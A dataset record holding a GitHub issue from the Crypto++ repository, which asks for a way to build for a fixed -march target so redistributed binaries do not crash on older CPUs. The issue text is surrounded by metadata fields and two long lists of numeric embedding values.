0.012118866667151451, -0.015790287405252457, 0.021567609161138535, 0.017101509496569633, 0.00000213803014048608, -0.014916139654815197, -0.014185033738613129, -0.04396168515086174, -0.004003199283033609, -0.004565435461699963, 0.005070056766271591, 0.014638001099228859, -0.0019866994116455317, -0.009051402099430561, -0.013310885988175869, 0.009202391840517521, -0.0010966580593958497, -0.006746831350028515, -0.007005102001130581, -0.02622443251311779, 0.016799530014395714, 0.006854113191366196, -0.000732595392037183, 0.005610438995063305, -0.03417123109102249, 0.005451503209769726, 0.0001786787761375308, 0.03277259320020676, -0.012937386520206928, -0.02091597206890583, -0.02151992730796337, 0.01606842502951622, 0.004255509935319424, -0.01323141809552908, 0.009559997357428074, 0.007688526529818773, -0.014892298728227615, 0.01713329553604126, -0.0206934604793787, -0.005785268731415272, 0.008995775133371353, -0.021265629678964615, 0.023443052545189857, -0.021424567326903343, 0.01201555784791708, 0.006401145365089178, 0.036809567362070084, -0.01888159103691578, 0.005964071489870548, -0.01451085228472948, 0.019358398392796516, 0.018706761300563812, -0.0019032580312341452, -0.017705464735627174, 0.01567903161048889, -0.0004335971607360989, -0.00036480766721069813, -0.00011560106941033155, 0.007227612659335136, -0.013287045992910862, 0.004112467635422945, 0.00879710540175438, 0.009114976972341537, 0.006285917013883591, 0.006039566360414028, -0.018071018159389496, 0.02775021828711033, 0.01145133562386036, -0.005526997614651918, 0.004740264732390642, 0.003093291074037552, -0.014097618870437145, 0.010116273537278175, 0.02015307918190956, -0.0010857312008738518, 0.012476472184062004, 0.004044920206069946, 0.014630054123699665, 0.0021833826322108507, 0.010855325497686863, 0.007211718708276749, 0.01667238213121891, -0.009385167621076107, 0.0058250026777386665, 0.011618218384683132, 0.017848508432507515, 0.0008666976355016232, -0.011053995229303837, -0.024587392807006836, -0.013771800324320793, -0.003975385334342718, -0.0003779695543926209, -0.021043119952082634, 0.010028858669102192, -0.018547825515270233, -0.00830440316349268, -0.021122587844729424, 0.022870883345603943, 0.004903174005448818, -0.002036366844549775, -0.007903090678155422, -0.01394663006067276, 0.016243254765868187, 0.023760925978422165, -0.00260456302203238, 0.007859382778406143, -0.00049245310947299, 0.011475175619125366, -0.0046965572983026505, -0.015424733981490135, 0.012079132720828056, 0.03283616900444031, 0.027909154072403908, 0.013175790198147297, -0.020057717338204384, 0.004748211707919836, 0.015488308854401112, 0.0030217699240893126, 0.003689300734549761, 0.013557236641645432, -0.005813082680106163, 0.02053452469408512, 0.011387760750949383, 0.009265965782105923, 0.01908820867538452, -0.006738884374499321, -0.03223221004009247, -0.01386716216802597, -0.015321426093578339, -0.0011304320069029927, -0.004327031318098307, 0.002403906313702464, 0.007430255878716707, 0.0002890647738240659, -0.004390605725347996, -0.0011344053782522678, 0.0046925838105380535, -0.010616921819746494, -0.028068089857697487, 0.013461875729262829, -0.001491017872467637, -0.027686642482876778, 0.008133547380566597, 0.008185201324522495, -0.023999329656362534, -0.0008552740910090506, -0.011586431413888931, 0.023395372554659843, 0.00008710435213288292, 0.002258877269923687, 0.0066514695063233376, 0.011014261282980442, 0.0006739877862855792, -0.007287213578820229, 0.010601027868688107, -0.011522856540977955, -0.02266426756978035, -0.003341628471389413, -0.007696473505347967, -0.003516457974910736, 0.00099036970641464, 0.001238707103766501, -0.004446233157068491, 0.01765778474509716, -0.0055627585388720036, -0.00583294965326786, -0.014542640186846256, -0.014685682021081448, 0.011173197999596596, 0.003580032382160425, 0.012643354944884777, -0.011340079829096794, 0.014939979650080204, -0.028227025642991066, -0.008876573294401169, 0.0073150270618498325, 0.013883055187761784, 0.03204149007797241, 0.020502738654613495, 0.011085783131420612, -0.011252665892243385, 0.012802290730178356, -0.0026542304549366236, -0.018595507368445396, -0.015400893986225128, 0.0118566220626235, 0.02638336829841137, 0.011355973780155182, -0.03858964890241623, -0.020598100498318672, 0.004299217369407415, -0.008093813434243202, -0.015186330303549767, 0.02083650417625904, -0.02236228808760643, -0.006885900162160397, 0.019374292343854904, -0.029212428256869316, -0.00583692267537117, -0.008876573294401169, -0.023935753852128983, -0.005507130641490221, -0.007450122851878405, 0.00663160253316164, 0.00043136210297234356, -0.004716424271464348, -0.0217424388974905, -0.008574594743549824, 0.005089923739433289, 0.0005974998348392546, 0.026335688307881355, -0.004259483423084021, 0.016028691083192825, 0.024460243061184883, -0.020582206547260284, -0.019533228129148483, 0.003407189389690757, 0.009718933142721653, -0.009941443800926208, 0.012317536398768425, -0.016275040805339813, 0.0036296998150646687, 0.029657449573278427, -0.0206298865377903, -0.01204734481871128, 0.000611903436947614, 0.013064535334706306, -0.023093394935131073, -0.013382406905293465, 0.002576749073341489, -0.010640761815011501, -0.01765778474509716, 0.00016762776067480445, -0.00004653222640627064, 0.008081893436610699, 0.0028310467023402452, 0.00022549038112629205, -0.011491069570183754, 0.005252833478152752, 0.0036257263273000717, 0.0005264753708615899, 0.008089840412139893, -0.003135011764243245, 0.00955205038189888, -0.019660377874970436, 0.006480613723397255, 0.017180977389216423, -0.015472414903342724, -0.00035661255242303014, 0.002036366844549775, 0.006214395631104708, 0.008336191065609455, 0.02873562090098858, -0.012802290730178356, 0.016354508697986603, -0.003015809692442417, -0.013128110207617283, 0.0018287567654624581, 0.00486741354689002, 0.005844869650900364, -0.01986699365079403, -0.012818184681236744, 0.007700446993112564, 0.0020522605627775192, -0.008654062636196613, 0.010171901434659958, -0.0310719795525074, -0.002614496508613229, -0.001094671431928873, -0.016577020287513733, -0.012420845218002796, 0.00989376287907362, 0.008022292517125607, 0.011705633252859116, -0.010330837219953537, 0.018293527886271477, -0.007501776795834303, -0.014606214128434658, 0.025445645675063133, -0.015734659507870674, 0.0020939812529832125, -0.004617089405655861, -0.01651344634592533, 0.003876050468534231, 0.004140281584113836, 0.03129448741674423, 0.017912082374095917, 0.018754443153738976, 0.0035442716907709837, 0.022330502048134804, -0.003522417973726988, -0.0020979545079171658, -0.009496423415839672, 0.012365217320621014, 0.0281157698482275, -0.011586431413888931, -0.003007862949743867, -0.0023601988796144724, 0.0021972896065562963, 0.0077163404785096645, 0.004513781052082777, 0.012150653637945652, 0.009997071698307991, 0.0003325238067191094, -0.006877953186631203, -0.01033878419548273, -0.02093186415731907, 0.023172862827777863, 0.006266050040721893, 0.004003199283033609, 0.01743527501821518, -0.0006124001229181886, -0.012492366135120392, -0.011165251024067402, 0.003397255903109908, -0.009369274601340294, 0.002127754967659712, 0.005809109192341566, -0.0003047100326512009, 0.0026760841719806194, 0.005789242219179869, -0.0005895530339330435, 0.02843364141881466, 0.0025986027903854847, 0.01482077781111002, -0.023474840447306633, -0.018929272890090942, 0.022314608097076416, 0.01459032017737627, -0.004382658749818802, 0.022648373618721962, 0.015861807391047478, 0.0037071811966598034, 0.0025171481538563967, 0.022950351238250732, -0.006150821223855019, -0.005471370182931423, 0.0012863879092037678, -0.0168154239654541, 0.023029819130897522, 0.01326320506632328, -0.01509096845984459, -0.00617863517254591, 0.0018525972263887525, -0.024523817002773285, 0.0019390186062082648, 0.014653895050287247, 0.006210422609001398, 0.012420845218002796, -0.0037290349137037992, 0.0049270144663751125, 0.004672716837376356, -0.003987305797636509, 0.012611567974090576, -0.008344137109816074, -0.01651344634592533, 0.011848675087094307, -0.002978062490001321, 0.017403487116098404, -0.005880630109459162, -0.024444349110126495, -0.016116105020046234, 0.000693358073476702, -0.017927976325154305, 0.0030317034106701612, 0.0030098496936261654, -0.011920196935534477, 0.004899200983345509, -0.007593165151774883, 0.000997323077172041, 0.0034409633371979, 0.014312182553112507, -0.013302939012646675, -0.011046049185097218, 0.014868458732962608, -0.00033202714985236526, 0.0020641807932406664, -0.013986364006996155, 0.009218284860253334, 0.011578484438359737, -0.0041680955328047276, -0.010879166424274445, 0.02485758252441883, 0.002858860418200493, 0.00011628399806795642, 0.023617882281541824, -0.008240829221904278, 0.019739845767617226, 0.0016966413240879774, -0.0017492888728156686, 0.0026204565074294806, 0.019008740782737732, 0.01721276342868805, -0.008093813434243202, 0.029593873769044876, -0.021774224936962128, 0.028099875897169113, -0.027019111439585686, -0.02250533178448677, -0.0008334204321727157, -0.0006625642417930067, -0.007918983697891235, 0.013708226382732391, -0.006361411418765783, 0.010728176683187485, 0.03537914156913757, 0.002656217198818922, 0.02182190679013729, -0.004068760201334953, -0.008781211450695992, 0.025032412260770798, -0.005491237156093121, -0.0009044448961503804, -0.007446149364113808, 0.009345433674752712, -0.004124388098716736, 0.0055627585388720036, 0.017610102891921997, -0.018531931564211845, 0.0231887549161911, 0.03754067048430443, 0.02183780074119568, -0.008264669217169285, 0.04237232357263565, 0.0010966580593958497, -0.017180977389216423, -0.0033634821884334087, 0.019739845767617226, -0.0018218033947050571, 0.005872683599591255, 0.013024801388382912, -0.020057717338204384, 0.012953280471265316, 0.025525113567709923, -0.00007145909330574796, 0.017180977389216423, 0.010831485502421856, 0.002109874738380313, 0.006452799774706364, 0.01781672053039074, 0.03518842160701752, 0.003949558362364769, -0.0020502738188952208, -0.015265798196196556, 0.01315195020288229, 0.0027913127560168505, 0.015551882795989513, 0.009798401966691017, -0.02083650417625904, -0.0003938631562050432, 0.010179847478866577, 0.0118248350918293, -0.01613994687795639, 0.02714626118540764, 0.026399262249469757, 0.0033734156750142574, 0.009027562104165554, 0.004497887566685677, 0.005813082680106163, -0.008097786456346512, 0.021504035219550133, 0.0023800658527761698, -0.004438286647200584, 0.0024118530564010143, -0.00036654603900387883, -0.012023504823446274, 0.03776318207383156, 0.01219833455979824, 0.016624700278043747, -0.011967876926064491, 0.010521559976041317, 0.012532100081443787, -0.06033208966255188, 0.01751474291086197, 0.0040051862597465515, -0.007513697259128094, -0.004783972166478634, 0.0011622192105278373, 0.008264669217169285, 0.004327031318098307, -0.018150486052036285, -0.011554643511772156, -0.0029760757461190224, 0.002046300331130624, 0.011991717852652073, -0.03541092947125435, 0.01948554813861847, -0.03693671524524689, 0.010759963653981686, -0.00680245878174901, 0.0027833657804876566, -0.013692332431674004, 0.027988621965050697, 0.012055291794240475, -0.00894014723598957, -0.01964448392391205, 0.0023125181905925274, -0.008232882246375084, -0.0001538450305815786, -0.013374460861086845, -0.008534860797226429, -0.0017413420137017965, -0.02183780074119568, 0.0022529170382767916, 0.0017115415539592505, 0.006202475633472204, -0.015051234513521194, 0.006242209579795599, 0.003208519658073783, 0.016251200810074806, -0.02388807386159897, 0.004950854927301407, 0.019056420773267746, 0.004366765264421701, 0.0031965994276106358, -0.028258811682462692, -0.0008582541486248374, -0.010807644575834274, 0.007434229366481304, 0.01420887466520071, -0.021790118888020515, 0.0034886442590504885, 0.0018277635099366307, 0.005892550572752953, 0.0081454673781991, 0.009512316435575485, -0.002554895356297493, -0.0036396333016455173, -0.0020304068457335234, 0.013366513885557652, -0.009234178811311722, -0.010887112468481064, -0.01110962312668562, 0.009981177747249603, -0.012142706662416458, 0.02903759852051735, -0.0023760925978422165, 0.007517670746892691, -0.0008815978653728962, 0.0004882313951384276, 0.007489856798201799, 0.012309589423239231, 0.003359508700668812, -0.014804883860051632, -0.0041005476377904415, -0.0187226552516222, 0.007199798710644245, 0.01575849950313568, 0.0031767324544489384, 0.0029283950570970774, 0.0030575303826481104, -0.008892466314136982, -0.035887736827135086, 0.022870883345603943, 0.003456857055425644, -0.0009118950110860169, -0.017943868413567543, 0.01459032017737627, -0.017006147652864456, 0.0010097399353981018, 0.016108158975839615, 0.008054079487919807, -0.0060634068213403225, -0.016878997907042503, -0.0031211047898977995, 0.019231250509619713, -0.005153498146682978, 0.015559829771518707, 0.0031509052496403456, 0.0010251369094476104, 0.0034429500810801983, 0.0037270481698215008, -0.006293863989412785, 0.012428791262209415, 0.01970805786550045, 0.015528042800724506, -0.03378978371620178, 0.0034926175139844418, 0.010434145107865334, -0.005872683599591255, -0.01741938106715679, 0.0010410305112600327, 0.008916307240724564, -0.012849971652030945, -0.024587392807006836, 0.002109874738380313, 0.002310531446710229, -0.0009491456439718604, 0.008264669217169285, -0.015639297664165497, 0.00011162767623318359, 0.013056588359177113, -0.00680245878174901, -0.0008945114095695317, -0.00007009323599049821, -0.0018873644294217229, -0.01031494326889515, 0.008630222640931606, 0.024237733334302902, -0.018388889729976654, 0.0580751970410347, -0.0155359897762537, 0.014606214128434658, -0.0017016080673784018, 0.0034449368249624968, 0.0024992679245769978, 0.018611399456858635, 0.0029840224888175726, 0.0007171984761953354, -0.015607510693371296, -0.0014363836962729692, -0.014034044928848743, 0.007839515805244446, -0.013787694275379181, -0.01087121944874525, 0.0021933161187916994, -0.006846166215837002, -0.025890666991472244, -0.004011146258562803, 0.003589965868741274, 0.0052568065002560616, 0.00014105565787758678, 0.004120414610952139, 0.02008950524032116, 0.010386464186012745, 0.005145551636815071, 0.0041005476377904415, 0.012977120466530323, 0.005960098467767239, -0.006337570957839489, 0.029466725885868073, 0.015424733981490135, 0.01269898284226656, -0.005439583212137222, -0.01621146686375141, 0.022378182038664818, -0.024285413324832916, 0.02539796568453312, 0.013199631124734879, -0.018102804198861122, -0.011046049185097218, -0.024698646739125252, -0.00511773768812418, -0.020709354430437088, 0.0010430171387270093, -0.004203855991363525, -0.007986531592905521, -0.0093613276258111, 0.0168154239654541, -0.004382658749818802, 0.00282508647069335, 0.0022906644735485315, -0.02881508879363537, 0.005296540446579456, 0.0212179496884346, 0.013724119402468204, -0.005530971102416515, 0.003178718965500593, -0.00602367240935564, 0.0033912959042936563, -0.011379814706742764, -0.020375588908791542, -0.0032184531446546316, 0.0012059265282005072, -0.01743527501821518, 0.02282320335507393, 0.0037508883979171515, -0.008105733431875706, 0.006409092340618372, 0.03722279891371727, -0.01583796739578247, -0.015591616742312908, -0.014343969523906708, 0.00211384822614491, -0.012428791262209415, -0.007398468442261219, 0.0032701073214411736, -0.0028509136755019426, -0.01568697951734066, 0.01103015523403883, 0.023856285959482193, -0.023633776232600212, 0.010052698664367199, -0.007076623383909464, -0.013787694275379181, -0.006214395631104708, -0.018309421837329865, 0.0008423605468124151, -0.0162909347563982, 0.0056620934046804905, 0.007469989825040102, -0.0048316530883312225, -0.014685682021081448, 0.007839515805244446, -0.0024118530564010143, -0.008431551977992058, 0.01140365470200777, -0.01246852520853281, 0.001928091747686267, 0.024158265441656113, 0.008971934206783772, -0.008971934206783772, -0.009989124722778797, 0.006043539848178625, -0.01413735281676054, 0.00119400629773736, 0.026049602776765823, -0.003979358822107315, 0.004839599598199129, 0.02220335230231285, 0.01741938106715679, 0.013954577036201954, -0.003301894525066018, -0.007001128979027271, -0.014725415967404842, -0.0019459720933809876, 0.0016708142356947064, -0.006500480696558952, 0.025890666991472244, -0.019835207611322403, -0.006639549508690834, 0.00776799488812685, 0.003522417973726988, -0.019533228129148483, -0.0044343131594359875, 0.011101676151156425, 0.00787924975156784, -0.01643397845327854, 0.023077500984072685, 0.02190137468278408, -0.0034548703115433455, -0.023315904662013054, 0.0062739965505898, -0.0217424388974905, 0.01749884895980358, 0.03556986525654793, 0.0033177880104631186, 0.009242125786840916, 0.0168154239654541, 0.027909154072403908, -0.0018307435093447566, 0.036587055772542953, 0.0016678341198712587, -0.02045505680143833, -0.02449203096330166, 0.002918461337685585, 0.0035144712310284376, -0.02091597206890583, -0.008550754748284817, -0.031564678996801376, 0.028942236676812172, 0.011634111404418945, 0.03145342692732811, -0.013708226382732391, -0.0018118699081242085, 0.016863103955984116, -0.021313311532139778, -0.010450039058923721, 0.009790454991161823, 0.01122087799012661, -0.010330837219953537, 0.025493327528238297, 0.008630222640931606, 0.019231250509619713, 0.011459282599389553, -0.0077163404785096645, 0.014566480182111263, 0.001798956305719912, 0.006313730962574482, 0.0032363333739340305, 0.011506962589919567, 0.009838135913014412, -0.02630390040576458, -0.005014429334551096, 0.019978249445557594, 0.017006147652864456, 0.015146596357226372, -0.0041005476377904415, 0.015790287405252457, -0.003981345798820257, -0.0027992594987154007, 0.027336984872817993, -0.028385961428284645, -0.0113003458827734, 0.003512484487146139, -0.007227612659335136, -0.008399765007197857, 0.009639465250074863, 0.003846250008791685, 0.004462127108126879, -0.0016747876070439816, 0.004617089405655861, 0.00928185973316431, -0.020518630743026733, -0.0074819098226726055, 0.006003805436193943, -0.013875109143555164, 0.003216466400772333, 0.03148521110415459, 0.00634949142113328, 0.0010171900503337383, -0.025715837255120277, 0.016577020287513733, 0.005598518997430801 ]
null
null
null
null
null
null
null
null
null
[ "weidai11", "cryptopp" ]
In the current form, Crypto++ will compile the library with optimal settings for the current build machine. However in many cases (as mine) we need to compile a generic version of the library such that the resulting binary can be redistributed. If Crypto++ is build on a high end machine and then shipped to a client with old hardware, it is very likely that the application will crash with an instruction unknown. It would be very useful if a target (-march=target) platform could be defined somewhere that would define all instruction sets supported. In this case all hardware tests should be ignored.
Crypto++ needs to support a fixed target
https://api.github.com/repos/weidai11/cryptopp/issues/1252/comments
2
2023-12-08T20:13:21
2023-12-09T05:49:26Z
https://github.com/weidai11/cryptopp/issues/1252
2,033,257,786
1,252
false
This is a GitHub Issue repo:cryptopp owner:weidai11 Title : Crypto++ needs to support a fixed target Issue date: --- start body --- In the current form, Crypto++ will compile the library with optimal settings for the current build machine. However in many cases (as mine) we need to compile a generic version of the library such that the resulting binary can be redistributed. If Crypto++ is build on a high end machine and then shipped to a client with old hardware, it is very likely that the application will crash with an instruction unknown. It would be very useful if a target (-march=target) platform could be defined somewhere that would define all instruction sets supported. In this case all hardware tests should be ignored. --- end body ---
767
[ -0.01806589774787426, -0.015310082584619522, -0.017511818557977676, 0.029847370460629463, 0.07267185300588608, 0.0326031856238842, -0.025662614032626152, 0.04581359773874283, -0.03680252283811569, 0.04913807287812233, -0.01805131509900093, 0.017818018794059753, 0.010432727634906769, -0.011927283369004726, -0.01073892880231142, -0.0022381881717592478, -0.026129206642508507, -0.014515415765345097, 0.001760659390129149, -0.009740128181874752, 0.01794924959540367, -0.0024696621112525463, 0.026479151099920273, 0.02328590676188469, -0.011467980220913887, 0.0005777733167633414, -0.029803626239299774, -0.011956444941461086, -0.049575503915548325, -0.012197031639516354, 0.03616095706820488, 0.0181096401065588, -0.03957291692495346, -0.014077984727919102, 0.02588132955133915, -0.011803343892097473, 0.03624844178557396, 0.040797725319862366, -0.06386491656303406, 0.013341642916202545, 0.017395170405507088, -0.01213141717016697, -0.0035523036494851112, 0.0020887325517833233, 0.0060292561538517475, 0.01968439109623432, 0.012831307016313076, 0.004461795557290316, -0.013057312928140163, -0.006944215856492519, 0.005358528811484575, -0.043597280979156494, -0.00028410227969288826, -0.030386867001652718, 0.00669998349621892, -0.039981186389923096, 0.024291997775435448, 0.0004125976120121777, 0.01736600697040558, 0.009601608850061893, -0.044384658336639404, 0.028957927599549294, 0.01084828656166792, 0.010097363963723183, 0.016578631475567818, 0.03193245828151703, -0.03951459378004074, 0.039222970604896545, -0.02140495367348194, 0.008296606130897999, -0.05453305318951607, -0.020165564492344856, 0.0362192802131176, -0.006393781863152981, 0.004556572064757347, -0.04488041251897812, 0.05709931626915932, 0.011285717599093914, 0.010162978433072567, 0.009353730827569962, -0.05088779702782631, 0.004749770741909742, -0.05715763941407204, -0.015718350186944008, 0.013604101724922657, -0.014799745753407478, 0.004676865413784981, -0.05150020122528076, -0.03534441813826561, 0.004899226129055023, -0.03126173093914986, 0.034119613468647, -0.028782954439520836, 0.015149691142141819, 0.0034958021715283394, 0.04237247630953789, -0.06024881824851036, 0.0004861862398684025, -0.040039509534835815, -0.011001387611031532, -0.026449989527463913, 0.008500740863382816, -0.02658121846616268, -0.012284518219530582, 0.018270030617713928, 0.00172420684248209, 0.04041861742734909, -0.01162837166339159, 0.028841279447078705, 0.06963900476694107, 0.006164130754768848, -0.0019374544499441981, 0.00581783102825284, -0.006900472566485405, -0.009361021220684052, 0.0026045364793390036, 0.007669622078537941, -0.052141766995191574, -0.03333223611116409, -0.009003786370158195, -0.034965310245752335, -0.026318760588765144, 0.025560546666383743, -0.026843678206205368, -0.05520378053188324, -0.011030550114810467, 0.0026737963780760765, 0.017788857221603394, 0.015149691142141819, -0.012466780841350555, -0.016374496743083, 0.010870158672332764, 0.021098751574754715, -0.013115637004375458, 0.01327602844685316, -0.00166314875241369, 0.042693257331848145, 0.042634934186935425, -0.0359276607632637, -0.007684203330427408, -0.00663801422342658, -0.040856048464775085, -0.021244561299681664, -0.008763199672102928, -0.022717244923114777, -0.03181580826640129, -0.024539874866604805, 0.014807036146521568, 0.005143458489328623, 0.023694174364209175, -0.01641824096441269, -0.008799651637673378, 0.013020860031247139, -0.0129771176725626, 0.042780742049217224, 0.014610192738473415, -0.004046236164867878, 0.0022983348462730646, 0.005099715664982796, 0.003605159930884838, -0.030474353581666946, -0.008872557431459427, 0.003435655264183879, 0.01544131152331829, 0.010279626585543156, 0.0019319865386933088, 0.007516521494835615, 0.03624844178557396, -0.03598598390817642, 0.016534889116883278, 0.0009135926957242191, 0.02940993942320347, 0.01905740611255169, 0.014595611952245235, -0.014369606040418148, 0.011905411258339882, -0.02932245284318924, 0.007596716750413179, 0.04566778615117073, -0.037473250180482864, -0.009798452258110046, 0.004286822862923145, 0.013137508183717728, 0.016899414360523224, 0.019990593194961548, -0.0015419439878314734, 0.006273488514125347, 0.025370992720127106, 0.04992545023560524, -0.002599068684503436, 0.034994471818208694, 0.028170550242066383, 0.016724441200494766, 0.017526399344205856, 0.035811010748147964, -0.012415747158229351, -0.021244561299681664, -0.04403471201658249, 0.006765598431229591, 0.03869805485010147, 0.004767997190356255, -0.0024076926056295633, -0.022994285449385643, -0.03429458290338516, -0.018809529021382332, 0.0224839486181736, -0.01329789962619543, 0.0484381839632988, 0.0052564614452421665, -0.026974907144904137, 0.007698784116655588, -0.0033390559256076813, -0.01417276170104742, -0.002839655615389347, -0.008274734951555729, 0.015528797172009945, 0.029118318110704422, -0.0007573022739961743, -0.05922814458608627, 0.010454598814249039, 0.015280920080840588, -0.02410244382917881, 0.0017715952126309276, -0.013888431712985039, -0.03099927119910717, 0.02758730947971344, 0.027208203449845314, 0.007403518073260784, -0.004075398202985525, 0.006291714496910572, 0.02230897732079029, 0.018736625090241432, -0.006751017179340124, 0.03525693342089653, 0.062348488718271255, 0.020180147141218185, -0.017016062512993813, -0.01796383038163185, -0.015718350186944008, 0.032369889318943024, 0.002017650054767728, 0.03088262304663658, -0.05438724532723427, -0.0498088002204895, 0.017599303275346756, 0.02239646390080452, 0.005278333090245724, 0.03989369794726372, -0.05593283474445343, 0.019261540845036507, -0.0066343690268695354, 0.002990933833643794, -0.001181063475087285, -0.023665012791752815, 0.0006019231514073908, -0.000543143367394805, 0.01993226818740368, 0.004374308977276087, -0.01994684897363186, -0.04391806572675705, 0.026231274008750916, 0.027193622663617134, -0.0057339901104569435, 0.02311093360185623, -0.058294959366321564, -0.010870158672332764, 1.388330588270037e-7, 0.01213870756328106, 0.009579736739397049, -0.05030455440282822, 0.038406435400247574, -0.0416434220969677, -0.008522612042725086, 0.0025079373735934496, 0.0033572823740541935, -0.02074880711734295, 0.033128101378679276, 0.02675619162619114, 0.03516944497823715, -0.006273488514125347, -0.011453399434685707, 0.04563862457871437, 0.007057218812406063, -0.002897979924455285, 0.010899320244789124, -0.016972320154309273, -0.06858916580677032, -0.019553162157535553, -0.049575503915548325, -0.019086569547653198, -0.005066907964646816, 0.017468074336647987, -0.046863432973623276, -0.008464287966489792, -0.00013715281966142356, -0.008077890612185001, -0.007902918383479118, -0.01974271610379219, 0.0009659932693466544, -0.004425342660397291, -0.0037947131786495447, -0.018678300082683563, 0.02836010418832302, -0.0025079373735934496, -0.011030550114810467, -0.015528797172009945, 0.008960043080151081, 0.014785164967179298, -0.007844594307243824, -0.027208203449845314, 0.02499188669025898, -0.026435408741235733, 0.014318572357296944, 0.04158509895205498, 0.007523811887949705, 0.007611298002302647, 0.012721949256956577, -0.01646198332309723, -0.04196420684456825, -0.00855906493961811, -0.06637284904718399, -0.0008265621727332473, -0.05316243693232536, -0.006437525153160095, -0.011467980220913887, -0.028155969455838203, -0.027208203449845314, 0.0257355198264122, -0.045930247753858566, -0.020121822133660316, -0.004370663780719042, -0.01644740253686905, -0.03630676493048668, -0.04735918715596199, -0.017555560916662216, -0.04245996102690697, -0.021259142085909843, -0.007625878788530827, -0.01640366017818451, 0.02166741155087948, 0.014865361154079437, 0.03444039449095726, -0.008857975713908672, 0.020340537652373314, -0.009623480029404163, -0.037531573325395584, -0.007815432734787464, -0.0010370757663622499, 0.0040024928748607635, 0.014930975623428822, 0.0009495895938016474, -0.012466780841350555, 0.03181580826640129, 0.029570329934358597, 0.0285204965621233, -0.022863056510686874, 0.026070883497595787, -0.03193245828151703, 0.002402224810793996, -0.016811927780508995, -0.016170362010598183, -0.009178758598864079, -0.015791255980730057, 0.00903294887393713, -0.023854566738009453, 0.06094870716333389, -0.007866466417908669, -0.005708473268896341, -0.0428682304918766, -0.011723148636519909, -0.008952752687036991, 0.009521412663161755, 0.026960326358675957, 0.019363608211278915, -0.02245478704571724, 0.0032880224753171206, 0.033040616661310196, 0.003947813995182514, -0.022090261802077293, 0.012809435836970806, -0.015893323346972466, 0.013713459484279156, 0.05080031231045723, -0.053862325847148895, 0.020457185804843903, -0.026843678206205368, -0.01082641538232565, -0.013851978816092014, -0.012459490448236465, -0.016505727544426918, -0.0081872483715415, -0.011781472712755203, -0.021929869428277016, -0.04409303516149521, -0.060773734003305435, 0.05680769681930542, 0.006791114807128906, -0.047738295048475266, 0.027047811076045036, 0.006065708585083485, 0.028753792867064476, -0.036598388105630875, 0.03528609499335289, 0.018459584563970566, 0.002701135817915201, -0.017438912764191628, -0.023023447021842003, -0.046163544058799744, -0.01796383038163185, 0.01822628825902939, 0.013604101724922657, -0.06316502392292023, -0.021798640489578247, 0.02748524211347103, -0.009266245178878307, 0.008282025344669819, -0.040097832679748535, 0.00032693403773009777, -0.03732743859291077, -0.016141200438141823, -0.022629760205745697, -0.016884833574295044, 0.000702623394317925, -0.007691493723541498, 0.04409303516149521, -0.016680698841810226, 0.0011755955638363957, 0.003947813995182514, 0.024335740134119987, -0.04753416031599045, -0.006484913174062967, 0.00033604720374569297, 0.019276121631264687, -0.00984948594123125, -0.0057339901104569435, 0.018357517197728157, -0.01889701560139656, 0.020428024232387543, -0.0365108996629715, -0.03852308169007301, -0.027222784236073494, 0.030678488314151764, -0.017599303275346756, -0.03721078857779503, 0.00150366872549057, -0.016024552285671234, -0.024802332744002342, -0.0012020237045362592, -0.008209120482206345, 0.0008958220714703202, 0.004115495830774307, 0.03161167353391647, 0.006543237715959549, -0.01415818091481924, 0.014136308804154396, -0.0002620028972160071, -0.04738834872841835, -0.003823875216767192, 0.072146937251091, -0.028097646310925484, -0.0005422320682555437, 0.002105136401951313, 0.026260435581207275, 0.0010999564547091722, 0.024525294080376625, 0.06602291017770767, 0.007538392674177885, -0.06421485543251038, 0.007713365368545055, -0.04073939844965935, -0.03989369794726372, 0.027047811076045036, 0.06112368032336235, -0.008726746775209904, 0.013669716194272041, 0.015485054813325405, -0.009317278861999512, -0.04292655363678932, -0.013224994763731956, -0.03368218243122101, -0.003461172105744481, -0.04283906891942024, -0.002786799566820264, -0.034790340811014175, -0.011358622461557388, -0.01544131152331829, -0.026275016367435455, 0.014012370258569717, 0.008282025344669819, 0.0552329421043396, -0.010607699863612652, 0.009783871471881866, 0.03271983191370964, -0.022921379655599594, -0.011453399434685707, 0.019524000585079193, -0.018794948235154152, 0.010666023939847946, 0.040126997977495193, 0.0021306530106812716, -0.04205169156193733, -0.016913995146751404, 0.025400156155228615, -0.022031936794519424, 0.020486347377300262, -0.015805836766958237, -0.012386585585772991, 0.0344112329185009, 0.026129206642508507, -0.015135109424591064, 0.00904752966016531, -0.033157262951135635, -0.015149691142141819, -0.02235271967947483, -0.0058579291217029095, -0.029643235728144646, -0.01806589774787426, -0.015660027042031288, 0.029949435964226723, -0.012452200055122375, 0.018415842205286026, -0.024510713294148445, -0.0014170939102768898, 0.02166741155087948, 0.026537476107478142, 0.011271136812865734, 0.009878648445010185, 0.0016494790324941278, -0.0265666376799345, -0.022265233099460602, -0.024554455652832985, 0.016009971499443054, -0.020092660561203957, 0.02077796868979931, -0.028841279447078705, -0.01121281273663044, 0.009769290685653687, -0.01824086904525757, -0.007932080887258053, 0.01625784859061241, -0.008318478241562843, 0.0038603278808295727, -0.027835186570882797, 0.009178758598864079, -0.03012440912425518, 0.015645446255803108, -0.0072759343311190605, -0.006138613913208246, 0.03164083510637283, 0.03566519916057587, -0.012197031639516354, -0.018590813502669334, -0.006237035617232323, -0.0034885115455836058, -0.009805742651224136, -0.009506831876933575, 0.02591049112379551, -0.010111944749951363, -0.008056019432842731, -0.017803438007831573, 0.001528274267911911, 0.0020486346911638975, 0.027980998158454895, 0.01727852039039135, -0.01981562003493309, -0.005467886570841074, 0.019174056127667427, 0.03616095706820488, -0.015251757577061653, -0.015164271928369999, 0.016768185421824455, -0.00027476128889247775, -0.011380494572222233, 0.020384280011057854, -0.02831636182963848, 0.0066744666546583176, -0.026085464283823967, 0.012692786753177643, -0.024612778797745705, -0.001278574112802744, 0.0085663553327322, -0.007647750433534384, -0.015120528638362885, 0.0039040709380060434, 0.02405869960784912, 0.00541685288771987, -0.0257355198264122, -0.03563603758811951, 0.004986712243407965, -0.037531573325395584, -0.019319865852594376, 0.03242821246385574, -0.03893135115504265, -0.0163015928119421, 0.030445192009210587, 0.00015002513828221709, 0.00645575113594532, 0.0008438771474175155, 0.0514710396528244, -0.022236071527004242, -0.007873756811022758, 0.004859128501266241, 0.041876718401908875, -0.0020632159430533648, -0.02246936783194542, 0.01891159638762474, -0.022731827571988106, -0.019626067951321602, -0.0043086945079267025, 0.008201830089092255, -0.021346628665924072, 0.003116695210337639, 0.004031654912978411, -0.011336751282215118, 0.025327250361442566, 0.00907669123262167, 0.011300298385322094, 0.002398579614236951, -0.015222596004605293, 